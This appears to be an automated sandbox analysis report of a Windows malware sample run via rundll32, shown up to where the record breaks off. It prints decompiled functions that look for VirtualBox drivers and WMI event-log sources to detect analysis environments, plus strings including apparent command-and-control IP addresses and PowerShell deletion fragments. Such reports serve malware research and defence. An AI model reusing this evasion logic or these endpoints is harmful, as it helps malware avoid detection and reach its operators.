47929 21ef2feaed9 47924->47929 47930 21ef301c2b0 47925->47930 47929->47922 47931 21ef301b6df 47930->47931 47932 21ef301c2ef 47930->47932 47931->47929 47938 21ef301b4bc 47931->47938 47932->47931 47933 21ef301c424 47932->47933 47934 21ef301c3de lstrcmpA 47932->47934 47933->47931 47935 21ef301c440 47933->47935 47934->47932 47934->47933 47948 21ef301c1ec 9 API calls 2 library calls 47935->47948 47937 21ef301c44b 47937->47931 47941 21ef301b4e8 47938->47941 47940 21ef301b573 47940->47929 47942 21ef301b54e 47941->47942 47949 21ef301b7d8 47941->47949 47942->47940 47957 21ef301c02c 47942->47957 47944 21ef301b5da VirtualProtectEx 47944->47940 47946 21ef301b63c VirtualProtectEx 47944->47946 47946->47940 47948->47937 47952 21ef301b806 47949->47952 47950 21ef301b882 47954 21ef301b8a8 VirtualQuery 47950->47954 47955 21ef301b8fe 47950->47955 47956 21ef301b8cb VirtualAlloc 47950->47956 47951 21ef301b825 VirtualQuery 47951->47952 47952->47950 47952->47951 47953 21ef301b848 VirtualAlloc 47952->47953 47953->47952 47953->47955 47954->47950 47955->47942 47956->47950 47956->47955 47960 21ef301c05e 47957->47960 47958 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47959 21ef301b5a4 47958->47959 47959->47940 47959->47944 47960->47958 47961 21ef2fe9060 48034 21ef301df60 47961->48034 47965 21ef2fe912d 47967 21ef2fe6530 5 API calls 47965->47967 47968 21ef2fe9151 47965->47968 47966 21ef2fe9124 WaitForSingleObject 47966->47965 47967->47968 47969 21ef3111f70 4 API calls 47968->47969 47970 21ef2fe916a 47969->47970 47971 21ef3111c8c 15 API calls 47970->47971 47972 21ef2fe9172 47971->47972 47973 21ef3111df0 8 API calls 47972->47973 47974 21ef2fe9196 47973->47974 47975 21ef2fe6400 5 API calls 47974->47975 47976 21ef2fe91ec 47975->47976 47977 21ef2fe6400 5 API calls 47976->47977 47978 21ef2fe9233 CoInitializeEx CoInitializeSecurity 47977->47978 47979 21ef301b3f0 6 API calls 47978->47979 47980 21ef2fe929a CreateEventW 47979->47980 47981 21ef2fe92ba CloseHandle 47980->47981 47983 21ef2fe92c4 _com_util::ConvertStringToBSTR 47980->47983 47982 21ef2fe92e5 CoUninitialize ExitProcess 47981->47982 47982->47983 48040 21ef2fe1610 21 API calls ctype 47983->48040 47985 21ef2fe940c 48041 21ef2fe3600 21 API calls memcpy_s 47985->48041 47987 21ef2fe9418 48042 21ef2fe1440 5 API calls memcpy_s 47987->48042 47989 21ef2fe942b 48043 21ef2feb0a0 RaiseException SetLastError SetLastError TlsGetValue TlsSetValue 47989->48043 47991 21ef2fe944c 48044 21ef2feb0a0 RaiseException SetLastError SetLastError TlsGetValue TlsSetValue 47991->48044 47993 21ef2fe946e 48045 21ef301cf50 RaiseException SetLastError SetLastError TlsGetValue TlsSetValue 47993->48045 47995 21ef2fe947b 47996 21ef2fe6530 5 API calls 47995->47996 47997 21ef2fe957f 47996->47997 47998 21ef2fe6400 5 API calls 47997->47998 47999 21ef2fe9603 47998->47999 48000 21ef2fe6400 5 API calls 47999->48000 48008 21ef2fe9654 48000->48008 48002 21ef2fea821 Sleep 48002->48008 48007 21ef2fea710 Sleep 48011 21ef2fea15f 48007->48011 48008->48011 48046 21ef2ff5850 72 API calls _CxxThrowException 48008->48046 48047 21ef2ff5cd0 72 API calls _CxxThrowException 48008->48047 48048 21ef2febb60 RaiseException 48008->48048 48010 21ef2fead20 48011->48008 48011->48010 48012 21ef2feaab5 48011->48012 48049 21ef2fe5d10 19 API calls 48011->48049 48050 21ef3111c60 15 API calls _Tolower 48011->48050 48051 21ef3111c60 15 API calls _Tolower 48011->48051 48013 21ef2fe6530 5 API calls 48012->48013 48014 21ef2feab02 48013->48014 48015 21ef2fe6400 5 API calls 48014->48015 48016 21ef2feab30 __security_init_cookie 48015->48016 48052 21ef2fe9020 RaiseException SetLastError SetLastError TlsGetValue TlsSetValue 48016->48052 48018 21ef2feab43 48053 21ef2feb660 RaiseException SetLastError SetLastError TlsGetValue TlsSetValue 48018->48053 48020 21ef2feab50 48054 21ef2fe82c0 5 API calls ctype 48020->48054 48022 21ef2feab64 48055 21ef2fe8170 5 API calls ctype 48022->48055 48024 21ef2feac4b 48056 21ef2fe82c0 5 API calls ctype 48024->48056 48026 21ef2feac62 48057 21ef2fe8170 5 API calls ctype 48026->48057 48028 21ef2feac78 48058 21ef2fe8170 5 API calls ctype 48028->48058 48030 21ef2feac9e 48059 21ef2feaf10 RaiseException SetLastError SetLastError TlsGetValue TlsSetValue 48030->48059 48032 21ef2feacc3 48060 21ef2ff5cd0 72 API calls _CxxThrowException 48032->48060 48035 21ef301e0e0 48034->48035 48036 21ef30210e0 12 API calls 48035->48036 48037 21ef301e0f7 48035->48037 48036->48035 48038 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 48037->48038 48039 21ef2fe9069 ExitProcess 48038->48039 48039->47965 48039->47966 48040->47985 48041->47987 48042->47989 48043->47991 48044->47993 48045->47995 48046->48008 48047->48008 48048->48008 48049->48011 48050->48007 48051->48002 48052->48018 48053->48020 48054->48022 48055->48024 48056->48026 48057->48028 48058->48030 48059->48032 48060->48010

                                        Executed Functions

                                        Function 0000021EF301E430 Relevance: 42.1, APIs: 6, Strings: 18, Instructions: 139COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 42%
                                        			E0000021E21EF301E430(long long __rbx, signed long long __rdi, long long __rsi) {
				int _t63;
				signed char _t65;
				void* _t72;
				void* _t80;
				void* _t84;
				signed long long _t97;
				signed long long _t118;
				void* _t139;
				signed long long _t144;
				WCHAR* _t149;
				void* _t150;
				void* _t152;
				signed long long _t153;
				void* _t155;

				_t144 = __rdi;
				 *((long long*)(_t152 + 8)) = __rbx;
				 *((long long*)(_t152 + 0x10)) = __rsi;
				 *((long long*)(_t152 + 0x18)) = __rdi;
				_t150 = _t152 - 0x5f0;
				_t153 = _t152 - 0x6f0;
				_t97 =  *0xf3203000; // 0x1fc8e4a4378e
				 *(_t150 + 0x5e0) = _t97 ^ _t153;
				 *((long long*)(_t153 + 0x30)) = L"System32\\drivers\\VBoxMouse.sys";
				r8d = 0x208;
				 *((long long*)(_t153 + 0x38)) = L"System32\\drivers\\VBoxGuest.sys";
				 *((long long*)(_t153 + 0x40)) = L"System32\\drivers\\VBoxSF.sys";
				 *((long long*)(_t153 + 0x48)) = L"System32\\drivers\\VBoxVideo.sys";
				 *((long long*)(_t153 + 0x50)) = L"System32\\vboxdisp.dll";
				 *((long long*)(_t153 + 0x58)) = L"System32\\vboxhook.dll";
				 *((long long*)(_t153 + 0x60)) = L"System32\\vboxmrxnp.dll";
				 *((long long*)(_t153 + 0x68)) = L"System32\\vboxogl.dll";
				 *((long long*)(_t153 + 0x70)) = L"System32\\vboxoglarrayspu.dll";
				 *((long long*)(_t153 + 0x78)) = L"System32\\vboxoglcrutil.dll";
				 *((long long*)(_t150 - 0x80)) = L"System32\\vboxoglerrorspu.dll";
				 *((long long*)(_t150 - 0x78)) = L"System32\\vboxoglfeedbackspu.dll";
				 *((long long*)(_t150 - 0x70)) = L"System32\\vboxoglpackspu.dll";
				 *((long long*)(_t150 - 0x68)) = L"System32\\vboxoglpassthroughspu.dll";
				 *((long long*)(_t150 - 0x60)) = L"System32\\vboxservice.exe";
				 *((long long*)(_t150 - 0x58)) = L"System32\\vboxtray.exe";
				 *((long long*)(_t150 - 0x50)) = L"System32\\VBoxControl.exe";
				E0000021E21EF310E410(_t72, 0, _t80, _t84, _t150 + 0x1d0, _t139, __rdi, _t155);
				r8d = 0x208;
				E0000021E21EF310E410(_t72, 0, _t80, _t84, _t150 - 0x40, _t139, _t144, _t155);
				 *(_t153 + 0x28) = _t144;
				_t63 = GetWindowsDirectoryW(_t149);
				0xf3020e50();
				if (_t63 == 0) goto 0xf301e577;
				__imp__Wow64DisableWow64FsRedirection();
				_t118 = _t144;
				__imp__PathCombineW();
				r8d = 0x200;
				E0000021E21EF310E410(_t72, 0, 0, _t84, _t150 + 0x3e0, _t150 + 0x1d0, _t144,  *((intOrPtr*)(_t153 + 0x30 + _t118 * 8)));
				0xf301e130();
				_t65 = GetFileAttributesW(??); // executed
				if (_t65 == 0xffffffff) goto 0xf301e5d9;
				if ((_t65 & 0x00000010) == 0) goto 0xf301e5e4;
				if (_t118 + 1 - 0x11 < 0) goto 0xf301e580;
				goto 0xf301e5e9;
				 *((intOrPtr*)(_t153 + 0x20)) = 0;
				if ( *0xf3204490 == 8) goto 0xf301e612;
				if (1 - 0x1e < 0) goto 0xf301e600;
				goto 0xf301e671;
				if ( *0x21EF32044E4 == dil) goto 0xf301e671;
				if ( *0xf3204490 == 8) goto 0xf301e63a;
				if (1 - 0x1e < 0) goto 0xf301e628;
				goto 0xf301e64f;
				if ( *((intOrPtr*)(0x21ef32044e4)) == dil) goto 0xf301e64f;
				GetCurrentProcess();
				 *((long long*)( *0x21EF32044E8))();
				if ( *((intOrPtr*)(_t153 + 0x20)) == 0) goto 0xf301e671;
				__imp__Wow64RevertWow64FsRedirection();
				E0000021E21EF310C290();
				return 1;
			}

















                                        0x21ef301e430
                                        0x21ef301e430
                                        0x21ef301e435
                                        0x21ef301e43a
                                        0x21ef301e440
                                        0x21ef301e448
                                        0x21ef301e44f
                                        0x21ef301e459
                                        0x21ef301e469
                                        0x21ef301e47c
                                        0x21ef301e482
                                        0x21ef301e48e
                                        0x21ef301e49a
                                        0x21ef301e4a6
                                        0x21ef301e4b2
                                        0x21ef301e4be
                                        0x21ef301e4ca
                                        0x21ef301e4d6
                                        0x21ef301e4e2
                                        0x21ef301e4ee
                                        0x21ef301e4f9
                                        0x21ef301e504
                                        0x21ef301e50f
                                        0x21ef301e51a
                                        0x21ef301e525
                                        0x21ef301e530
                                        0x21ef301e534
                                        0x21ef301e53f
                                        0x21ef301e545
                                        0x21ef301e558
                                        0x21ef301e55d
                                        0x21ef301e563
                                        0x21ef301e56a
                                        0x21ef301e571
                                        0x21ef301e579
                                        0x21ef301e590
                                        0x21ef301e59f
                                        0x21ef301e5a5
                                        0x21ef301e5c1
                                        0x21ef301e5ca
                                        0x21ef301e5d3
                                        0x21ef301e5d7
                                        0x21ef301e5e0
                                        0x21ef301e5e2
                                        0x21ef301e5f0
                                        0x21ef301e603
                                        0x21ef301e60e
                                        0x21ef301e610
                                        0x21ef301e621
                                        0x21ef301e62b
                                        0x21ef301e636
                                        0x21ef301e638
                                        0x21ef301e648
                                        0x21ef301e64f
                                        0x21ef301e65d
                                        0x21ef301e664
                                        0x21ef301e66b
                                        0x21ef301e67d
                                        0x21ef301e69a

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Wow64$Redirection$AttributesCombineCurrentDirectoryDisableFilePathProcessRevertWindows
                                        • String ID: Checking file %s $System32\VBoxControl.exe$System32\drivers\VBoxGuest.sys$System32\drivers\VBoxMouse.sys$System32\drivers\VBoxSF.sys$System32\drivers\VBoxVideo.sys$System32\vboxdisp.dll$System32\vboxhook.dll$System32\vboxmrxnp.dll$System32\vboxogl.dll$System32\vboxoglarrayspu.dll$System32\vboxoglcrutil.dll$System32\vboxoglerrorspu.dll$System32\vboxoglfeedbackspu.dll$System32\vboxoglpackspu.dll$System32\vboxoglpassthroughspu.dll$System32\vboxservice.exe$System32\vboxtray.exe
                                        • API String ID: 2137468328-1036852472
                                        • Opcode ID: aa2e16ca087441f2ea2c4c29c136bfb4107812c7c7544892d5e57efb955406d6
                                        • Instruction ID: 170fb5ebd68fdcd2d0fadfeee845432590fc04343494a2f8acca79813087c2ae
                                        • Opcode Fuzzy Hash: aa2e16ca087441f2ea2c4c29c136bfb4107812c7c7544892d5e57efb955406d6
                                        • Instruction Fuzzy Hash: 07610236610B4095EB119B14EC882DE73F5FBA8784F960226DE8D43BA9EE3CC55AC740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301EC20 Relevance: 38.7, APIs: 14, Strings: 8, Instructions: 191memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 35 21ef301ec20-21ef301ec82 call 21ef30211c0 38 21ef301ec88-21ef301ecc8 call 21ef31445f8 * 2 35->38 39 21ef301ef2b-21ef301ef2e 35->39 47 21ef301ed20-21ef301ed23 38->47 48 21ef301ecca-21ef301eccd 38->48 41 21ef301ef12-21ef301ef2a call 21ef310c290 39->41 51 21ef301ed2e-21ef301ed30 47->51 52 21ef301ed25-21ef301ed28 SysFreeString 47->52 49 21ef301eccf-21ef301ecec 48->49 50 21ef301ed17-21ef301ed1a SysFreeString 48->50 57 21ef301ecf6-21ef301ecf8 49->57 50->47 53 21ef301ed36-21ef301ed45 51->53 54 21ef301eef7-21ef301ef0a 51->54 52->51 55 21ef301eed7-21ef301eef1 CoUninitialize 53->55 56 21ef301ed4b 53->56 54->41 55->54 58 21ef301ed53-21ef301ed56 56->58 57->50 59 21ef301ecfa-21ef301ed11 CoUninitialize 57->59 61 21ef301eecf 58->61 62 21ef301ed5c-21ef301ed7a 58->62 59->50 61->55 66 21ef301ed80-21ef301eda4 62->66 67 21ef301eecb 62->67 71 21ef301eeb2-21ef301eec3 66->71 72 21ef301edaa-21ef301edb2 66->72 67->61 71->58 78 21ef301eec9 71->78 72->71 73 21ef301edb8-21ef301edba 72->73 74 21ef301edc0-21ef301edd3 StrCmpIW 73->74 75 21ef301eea8-21ef301eeac VariantClear 73->75 74->75 77 21ef301edd9-21ef301ee18 VariantClear SafeArrayAccessData 74->77 75->71 77->75 80 21ef301ee1e-21ef301ee4e SafeArrayGetLBound SafeArrayGetUBound 77->80 78->61 81 21ef301ee50-21ef301ee68 SafeArrayGetElement 80->81 82 21ef301ee9f-21ef301eea2 SafeArrayUnaccessData 80->82 83 21ef301ee70-21ef301ee7e call 21ef3120790 81->83 82->75 86 21ef301ee80-21ef301ee89 83->86 87 21ef301ee99 83->87 86->83 88 21ef301ee8b-21ef301ee95 86->88 87->82 88->81 89 21ef301ee97 88->89 89->82
                                        C-Code - Quality: 21%
                                        			E0000021E21EF301EC20(void* __edx, long long __rbx, long long __rdi, long long __rsi, long long __r14) {
				void* _t80;
				void* _t81;
				signed char _t87;
				void* _t88;
				intOrPtr _t91;
				void* _t107;
				signed long long _t128;
				long long _t132;
				intOrPtr* _t151;
				long long _t187;
				void* _t189;
				void* _t190;
				signed long long _t191;
				long long _t201;
				void* _t205;

				_t187 = __rsi;
				_t189 = _t190 - 0x47;
				_t191 = _t190 - 0xb0;
				_t128 =  *0xf3203000; // 0x1fc8e4a4378e
				 *(_t189 + 0x37) = _t128 ^ _t191;
				r12d = 0;
				 *((long long*)(_t189 + 0x1f)) = L"vboxvideo";
				 *((long long*)(_t189 - 0x21)) = _t201;
				 *((long long*)(_t189 + 0x27)) = L"VBoxVideoW8";
				_t132 = L"VBoxWddm";
				 *((long long*)(_t189 - 0x11)) = _t201;
				 *((long long*)(_t189 + 0x2f)) = _t132;
				r15d = r12d;
				 *((long long*)(_t189 - 0x29)) = _t201;
				_t81 = E0000021E21EF30211C0(_t80, _t189 - 0x21, _t189 - 0x11, __rsi); // executed
				if (_t81 == 0) goto 0xf301ef2b;
				 *((long long*)(_t191 + 0xd0)) = __rbx;
				 *((long long*)(_t191 + 0xd8)) = _t187;
				 *((long long*)(_t191 + 0xe0)) = __rdi;
				__imp__#2();
				__imp__#2();
				if (_t132 == 0) goto 0xf301ed20;
				if (_t132 == 0) goto 0xf301ed17;
				 *((long long*)(_t191 + 0x28)) = _t189 - 0x29;
				_t18 = _t201 + 0x30; // 0x30
				r9d = _t18;
				 *((long long*)(_t191 + 0x20)) = _t201;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x21)))) + 0xa0))() >= 0) goto 0xf301ed17;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x21)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x11)))) + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (_t132 == 0) goto 0xf301ed2e;
				__imp__#6();
				if (r12d == 0) goto 0xf301eef7;
				_t151 =  *((intOrPtr*)(_t189 - 0x29));
				 *((long long*)(_t189 - 0x31)) = _t201;
				 *((intOrPtr*)(_t189 - 0x35)) = r12d;
				if (_t151 == 0) goto 0xf301eed7;
				 *((long long*)(_t191 + 0xe8)) = __r14;
				if (r15d != 0) goto 0xf301eecf;
				 *((long long*)(_t191 + 0x20)) = _t189 - 0x35;
				_t32 = _t205 + 1; // 0x1, executed
				r8d = _t32;
				 *((intOrPtr*)( *_t151 + 0x20))();
				if ( *((intOrPtr*)(_t189 - 0x35)) == r12d) goto 0xf301eecb;
				 *((long long*)(_t191 + 0x28)) = _t201;
				r8d = 0;
				 *((long long*)(_t191 + 0x20)) = _t201;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x31)))) + 0x20))() < 0) goto 0xf301eeb2;
				_t87 =  *(_t189 - 9) & 0x0000ffff;
				if (_t87 == 1) goto 0xf301eeb2;
				if ((_t87 & 0x00000008) == 0) goto 0xf301eea8;
				__imp__StrCmpIW();
				if (_t87 != 0) goto 0xf301eea8;
				__imp__#9();
				 *((long long*)(_t191 + 0x28)) = _t201;
				r8d = 0;
				 *((long long*)(_t191 + 0x20)) = _t201;
				_t88 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x31)))) + 0x20))();
				__imp__#23();
				if (_t88 < 0) goto 0xf301eea8;
				__imp__#20();
				_t55 = _t205 + 1; // 0x1
				__imp__#19();
				_t107 =  *((intOrPtr*)(_t189 - 0x19)) -  *((intOrPtr*)(_t189 - 0x15)) + 1;
				 *((intOrPtr*)(_t189 - 0x39)) = r12d;
				if (_t107 <= 0) goto 0xf301ee9f;
				__imp__#25(); // executed
				if (E0000021E21EF3120790(_t55,  *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x31)))),  *((intOrPtr*)(_t189 + 0xf)),  *((intOrPtr*)(_t189 + 0x1f))) == 0) goto 0xf301ee99;
				if (r12d + 1 - 3 < 0) goto 0xf301ee70;
				_t91 =  *((intOrPtr*)(_t189 - 0x39)) + 1;
				 *((intOrPtr*)(_t189 - 0x39)) = _t91;
				if (_t91 - _t107 < 0) goto 0xf301ee50;
				goto 0xf301ee9f;
				r15d = 1;
				__imp__#24();
				__imp__#9();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x31)))) + 0x10))();
				if ( *((intOrPtr*)(_t189 - 0x29)) != 0) goto 0xf301ed53;
				goto 0xf301eecf;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x29)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x21)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x11)))) + 0x10))();
				__imp__CoUninitialize(); // executed
				E0000021E21EF310C290();
				return r15d;
			}


















                                        0x21ef301ec20
                                        0x21ef301ec26
                                        0x21ef301ec2b
                                        0x21ef301ec32
                                        0x21ef301ec3c
                                        0x21ef301ec40
                                        0x21ef301ec4a
                                        0x21ef301ec59
                                        0x21ef301ec5d
                                        0x21ef301ec65
                                        0x21ef301ec6c
                                        0x21ef301ec70
                                        0x21ef301ec74
                                        0x21ef301ec77
                                        0x21ef301ec7b
                                        0x21ef301ec82
                                        0x21ef301ec88
                                        0x21ef301ec97
                                        0x21ef301ec9f
                                        0x21ef301eca7
                                        0x21ef301ecb7
                                        0x21ef301ecc8
                                        0x21ef301eccd
                                        0x21ef301ecd7
                                        0x21ef301ecdc
                                        0x21ef301ecdc
                                        0x21ef301ece4
                                        0x21ef301ecf8
                                        0x21ef301ed04
                                        0x21ef301ed0e
                                        0x21ef301ed11
                                        0x21ef301ed1a
                                        0x21ef301ed23
                                        0x21ef301ed28
                                        0x21ef301ed30
                                        0x21ef301ed36
                                        0x21ef301ed3a
                                        0x21ef301ed3e
                                        0x21ef301ed45
                                        0x21ef301ed4b
                                        0x21ef301ed56
                                        0x21ef301ed63
                                        0x21ef301ed6f
                                        0x21ef301ed6f
                                        0x21ef301ed73
                                        0x21ef301ed7a
                                        0x21ef301ed88
                                        0x21ef301ed94
                                        0x21ef301ed97
                                        0x21ef301eda4
                                        0x21ef301edaa
                                        0x21ef301edb2
                                        0x21ef301edba
                                        0x21ef301edcb
                                        0x21ef301edd3
                                        0x21ef301eddd
                                        0x21ef301edeb
                                        0x21ef301edf7
                                        0x21ef301edfa
                                        0x21ef301ee02
                                        0x21ef301ee10
                                        0x21ef301ee18
                                        0x21ef301ee29
                                        0x21ef301ee36
                                        0x21ef301ee3a
                                        0x21ef301ee46
                                        0x21ef301ee48
                                        0x21ef301ee4e
                                        0x21ef301ee5b
                                        0x21ef301ee7e
                                        0x21ef301ee89
                                        0x21ef301ee8e
                                        0x21ef301ee90
                                        0x21ef301ee95
                                        0x21ef301ee97
                                        0x21ef301ee99
                                        0x21ef301eea2
                                        0x21ef301eeac
                                        0x21ef301eeb9
                                        0x21ef301eec3
                                        0x21ef301eec9
                                        0x21ef301eeda
                                        0x21ef301eee4
                                        0x21ef301eeee
                                        0x21ef301eef1
                                        0x21ef301ef19
                                        0x21ef301ef2a

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ArraySafe$String$AllocBoundClearDataFreeUninitializeVariant$AccessElementInitializeUnaccess
                                        • String ID: FileName$SELECT * FROM Win32_NTEventlogFile$Sources$System$VBoxVideoW8$VBoxWddm$WQL$vboxvideo
                                        • API String ID: 1020912672-1865646205
                                        • Opcode ID: 1365cdf0c3cf057d5e9c74e6631ed414abe84b80192fdf32d0dd480e151a30fb
                                        • Instruction ID: 6c6b74f22371ff005cb052beecb0a91cdc931201dfc1fa34300635f5e8df3883
                                        • Opcode Fuzzy Hash: 1365cdf0c3cf057d5e9c74e6631ed414abe84b80192fdf32d0dd480e151a30fb
                                        • Instruction Fuzzy Hash: 8A910F76700A508AEB20DF61E8987DE73B0F798B88F424512DE4A67F68DF38C55AC340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FE915A Relevance: 35.6, APIs: 10, Strings: 10, Instructions: 588COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 100 21ef2fe915a-21ef2fe91cb ExitProcess call 21ef3111f70 call 21ef3111c8c call 21ef3111df0 108 21ef2fe91cd-21ef2fe91d0 100->108 109 21ef2fe91d2 100->109 110 21ef2fe91e0-21ef2fe9213 call 21ef2fe6400 108->110 111 21ef2fe91d6-21ef2fe91de 109->111 114 21ef2fe921a-21ef2fe921e 110->114 115 21ef2fe9215-21ef2fe9218 110->115 111->110 111->111 116 21ef2fe9220-21ef2fe9228 114->116 117 21ef2fe922a-21ef2fe92b8 call 21ef2fe6400 CoInitializeEx CoInitializeSecurity call 21ef301b3f0 CreateEventW 115->117 116->116 116->117 122 21ef2fe92ba-21ef2fe92f3 CloseHandle CoUninitialize ExitProcess 117->122 123 21ef2fe92c4-21ef2fe92cf call 21ef31443c8 117->123 126 21ef2fe92f4-21ef2fe95e9 call 21ef301cdd0 call 21ef301cad0 call 21ef2fe8b00 call 21ef2fe15c0 * 2 call 21ef2fe1610 call 21ef2fe3600 call 21ef2fe1440 call 21ef2feb0a0 * 2 call 21ef301cf50 call 21ef301cc50 call 21ef2fe6530 call 21ef2fe6310 122->126 123->126 160 21ef2fe95f0-21ef2fe95f8 126->160 160->160 161 21ef2fe95fa-21ef2fe963a call 21ef2fe6400 160->161 165 21ef2fe9640-21ef2fe9648 161->165 165->165 166 21ef2fe964a-21ef2fe973e call 21ef2fe6400 call 21ef2fe6a70 165->166 173 21ef2fe9742-21ef2fe975d 166->173 174 21ef2fea81c-21ef2fea848 call 21ef3111c60 Sleep 173->174 175 21ef2fe9763-21ef2fe9813 call 21ef2ff5850 call 21ef3014e20 call 21ef2ff5cd0 173->175 174->173 186 21ef2fe98e9 call 21ef310ba8c 175->186 187 21ef2fe9903-21ef2fe9b68 call 21ef2febb60 175->187 191 21ef2fe98ee-21ef2fe98fe 186->191 196 21ef2fea70b-21ef2fea742 call 21ef3111c60 Sleep 187->196 197 21ef2fe9b6e-21ef2fea159 call 21ef2feb470 * 2 187->197 191->173 202 21ef2fea74a-21ef2fea777 call 21ef3111fb0 call 21ef310bdc8 196->202 203 21ef2fea744-21ef2fea749 call 21ef2feb260 196->203 197->196 214 21ef2fea15f-21ef2fea554 call 21ef2fe5d10 197->214 215 21ef2fea7bb-21ef2fea7d4 202->215 216 21ef2fea779-21ef2fea784 202->216 203->202 214->196 280 21ef2feaab5-21ef2fead81 call 21ef2fe6530 call 21ef2fe6400 call 21ef31443b0 call 21ef2fe9020 call 21ef2feb660 call 21ef2fe82c0 call 21ef2fe8170 call 21ef2fe82c0 call 21ef2fe8170 * 2 call 21ef2feaf10 call 21ef3014e20 call 21ef2ff5cd0 call 21ef301c460 214->280 215->191 221 21ef2fea7da-21ef2fea7e4 215->221 218 21ef2fea7b6 call 21ef310ba8c 216->218 219 21ef2fea786-21ef2fea789 216->219 218->215 222 21ef2feada7-21ef2feadac call 21ef3111be8 219->222 223 21ef2fea78f-21ef2fea796 219->223 221->186 226 21ef2fea7ea-21ef2fea7ed 221->226 241 21ef2feadad-21ef2feadb2 call 21ef3111be8 222->241 227 21ef2fea79c-21ef2fea7a3 223->227 228 21ef2feada1-21ef2feada6 call 21ef3111be8 223->228 230 21ef2fea7f3-21ef2fea7fa 226->230 231 21ef2feadbf-21ef2feae01 call 21ef3111be8 call 21ef2fe6100 * 2 226->231 233 21ef2fead9b-21ef2feada0 call 21ef3111be8 227->233 234 21ef2fea7a9-21ef2fea7ad 227->234 228->222 238 21ef2feadb9-21ef2feadbe call 21ef3111be8 230->238 239 21ef2fea800-21ef2fea807 230->239 269 21ef2feae02 231->269 233->228 242 21ef2fead95-21ef2fead9a call 21ef3111be8 234->242 243 21ef2fea7b3 234->243 238->231 249 21ef2fea80d-21ef2fea811 239->249 250 21ef2feadb3-21ef2feadb8 call 21ef3111be8 239->250 241->250 242->233 243->218 249->241 258 21ef2fea817 249->258 250->238 258->174 269->269 280->242
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitHandleInitializeProcess$AddressCloseCreateErrorEventLastModuleProcSecurityUninitialize_invalid_parameter_noinfo
                                        • String ID: " -Force$2104a$282.19.133.12:443,91.122.18.192:443,185.156.172.62:443,72.123.65.11:443,149.255.35.167:443,172.241.27.146:443$3C29FEA2-6FE8-4BF9-B98A-0E3442115F67$444$; Remove-Item -Path "$BLACK$powershell$response_status$tasks
                                        • API String ID: 2740944658-2167360499
                                        • Opcode ID: 034357c79ffeb2bc058e87afe819c1f531048a7aaadc86a8783f0d4c1f95a398
                                        • Instruction ID: 2f3fc143dde432a1ac57ec69bd36a79ae850c94bf61b0d5a8c48d42230e76055
                                        • Opcode Fuzzy Hash: 034357c79ffeb2bc058e87afe819c1f531048a7aaadc86a8783f0d4c1f95a398
                                        • Instruction Fuzzy Hash: 38527872220BC689EF219B64DC483DE23A5F761758F410616DE592BEDADF78C686C380
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301F9C0 Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 181memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 314 21ef301f9c0-21ef301f9ed call 21ef30211c0 317 21ef301fc43-21ef301fc4d 314->317 318 21ef301f9f3-21ef301fa33 call 21ef31445f8 * 2 314->318 323 21ef301fa35-21ef301fa38 318->323 324 21ef301fa8a-21ef301fa92 318->324 327 21ef301fa81-21ef301fa84 SysFreeString 323->327 328 21ef301fa3a-21ef301fa56 323->328 325 21ef301fa94-21ef301fa97 SysFreeString 324->325 326 21ef301fa9d-21ef301faaa 324->326 325->326 329 21ef301fab0-21ef301fabf 326->329 330 21ef301fc33-21ef301fc42 326->330 327->324 333 21ef301fa60-21ef301fa62 328->333 331 21ef301fac5-21ef301facf 329->331 332 21ef301fc13-21ef301fc2d CoUninitialize 329->332 334 21ef301fad0-21ef301fae3 331->334 332->330 333->327 335 21ef301fa64-21ef301fa7b CoUninitialize 333->335 337 21ef301fae9-21ef301faed 334->337 335->327 339 21ef301fc0f 337->339 340 21ef301faf3-21ef301fb17 337->340 339->332 345 21ef301fb48-21ef301fb6c 340->345 346 21ef301fb19-21ef301fb21 340->346 352 21ef301fb6e-21ef301fb76 345->352 353 21ef301fb9d-21ef301fbc1 345->353 346->345 347 21ef301fb23-21ef301fb25 346->347 349 